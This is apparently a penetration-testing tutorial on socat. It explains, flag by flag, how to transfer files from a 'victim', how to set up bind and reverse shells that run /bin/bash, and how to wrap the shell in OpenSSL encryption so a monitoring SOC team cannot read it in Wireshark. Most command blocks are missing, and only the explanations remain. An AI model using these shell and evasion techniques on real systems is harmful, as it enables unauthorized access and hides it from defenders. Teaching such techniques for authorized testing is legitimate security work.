Socat
The abbreviation of the tool name is Socket Cat
SOCAT
Connection To a TCP/UDP Port
Attacker Machine
-
Stdin
Listening To a TCP/UDP Port
Victim Machine
Transfer File With Socat
Attacker Machine
socat
: This is the command itself, which stands for "SOcket CAT". It is a multipurpose relay tool that can create two bidirectional byte streams and transfer data between them.TCP4
: This specifies the address type and protocol to be used.TCP4
indicates that the connection will use the IPv4 protocol with TCP.<
IP
>: This is a placeholder for the IP address of the remote host to which you want to connect.<
PORT
>: This is a placeholder for the port number on the remote host to which you want to connect.file.tx
t: This specifies the second address as a file. The data received from the TCP connection will be written to (or read from) this file. Here,sec.txt
is the filename.create
: This option ensures that the filesec.txt
is created if it does not already exist. Without this option, if the file does not exist, the command would fail.
Victim Machine
socat
: This is the command itself, which stands for "SOcket CAT". It is a utility for data transfer between two bidirectional data streams.TCP4-LISTEN:<PORT>
: This specifies thatsocat
should listen for incoming TCP connections on the specified port (replace<PORT>
with the actual port number you want to use).fork
: This option tellssocat
to fork (create a new process) for each incoming connection. This allowssocat
to handle multiple connections simultaneously.file:sec.txt
: This specifies that the data received from each connection should be written to the filesec.txt
.
The advantage of
Socat
is that it allows more than one person to connect to the same port at the same time, and the connection is not separated, which is what distinguishes it fromNC
.
U Cant Use Standard Input | Output And Redirect
Victim Machine
-
-> Using Standard Input , After This , Waiting for Input
<
-> Using Redirect Character , Send Content File
Attacker Machine
-
-> Using Standard Input , After This , Waiting for Input
>
-> Using Redirect Character , Store In File (Override)
>>
-> If U Want Adding Content In File With Old Value
Socat Bind
Attacker Machine
Victim Machine
socat
: The command-line utility for bidirectional data transfer between two independent data channels.-d -d -d
: These flags enable different levels of debugging output. Each-d
increases the verbosity of the debug information.tcp4-listen:<PORT>
: This option tellssocat
to listen for incoming TCP connections on the specified port (<PORT>
). Thetcp4
part specifies that only IPv4 connections are accepted.fork
: This option tellssocat
to fork a new process for each incoming connection. This allows multiple clients to connect simultaneously, each handled by its own process.exec:/bin/bash
: This part of the command specifies that when a connection is established,socat
should execute/bin/bash
. This effectively provides a shell to the connected client.
Socat Reverse Shells
Attacker Machine
Victim Machine
Socat Encrypted Bund Shell
In normal use of the tool, if there is someone monitoring the communications that occur, if there is a SOC team monitoring everything that happens. It will see exactly what you are doing in terms of commands on the server or to victims inside the network and other things, so you may be easily detected and even know exactly what you were doing.
Let's see this , Using Wireshark :
Here I use a filter to filter the TCP packets because you will find a lot of connections using more than one different protocol, and this is a normal thing within the network.
--
As you can see, as soon as he typed the ls command, the packet and connections started to appear
--
If you notice some strange letters, this is because those strange letters have a relationship to the colors that appear in the terminal. Some of them have a relationship to the formats inside the terminal, such as dropping a new line to display the rest of the files, such as the color of the file name and the color of the folders.
As you can see, this is a behavior that is very clear to anyone monitoring what is happening on the network
--
To hide this, we will encrypt the packet and all communications that occur between us and the other device , Using an encryption key we will create
Generate key.pem
req
⇒ Indicates that we want to use OpenSSL in requests mode, which is used to create or process requests for SSL certificates.
-x509
⇒ Indicates that we want to create an X.509 certificate, which is a common format for digital certificates.
-newkey rsa:4096
⇒ OpenSSL says it should generate a new RSA key pair with a length of 4096 bits. The private and public key are generated in this step
-keyout
⇒ Specifies the name of the file in which the private key will be saved. In this case, the private key will be saved in a file called key.pem
-out
⇒ Specifies the name of the file in which the public certificate will be saved. In this case, the public certificate will be saved in a file called cert.pem.
-days
⇒ It determines the validity period of the certificate after its issuance, and here it is set to be valid for one year (365 days).
--
Attacker
Victim
Wireshark
Data is Encrypted Using openssl
Socat VS Netcat
Summary Table
Feature | Netcat (nc) | Socat |
---|---|---|
Protocol Support | TCP, UDP | TCP, UDP, SCTP, UNIX sockets, and more |
Ease of Use | Simple, easy to use | More complex, steeper learning curve |
Functionality | Basic networking tasks | Advanced networking capabilities |
Port Scanning | Yes | No |
Data Transformation | No | Yes |
Proxying/Relaying | Basic | Advanced |
Debugging | Basic | Detailed |
File Transfer | Yes | Yes |
Conclusion
Use
netcat
for simpler, quick networking tasks such as port scanning, basic data transfer, and simple shell setups.Use
socat
when you need advanced capabilities such as data transformation, complex proxying, and handling multiple types of sockets and protocols.
Choose the tool based on the complexity of the task and the level of control you need over the network connections and data streams.
Reverse shell VS Bind
Summary Table
Feature | Reverse Shell | Bind Shell |
---|---|---|
Connection Initiator | Target | Attacker |
Firewall/NAT Evasion | Easier | Harder |
Setup Complexity | More complex on target side | Simpler on target side |
Detection Risk | Moderate (outbound connection) | Higher (listening port) |
Use Case | When outbound connections are allowed | When the attacker can’t receive connections |
Conclusion
Reverse Shell is generally more flexible in bypassing network restrictions.
Bind Shell can be simpler but is more likely to be blocked by network defenses.
Choose the method based on the network environment and specific constraints you are working with. Always ensure you have authorization and understand the legal implications of using these techniques.
Last updated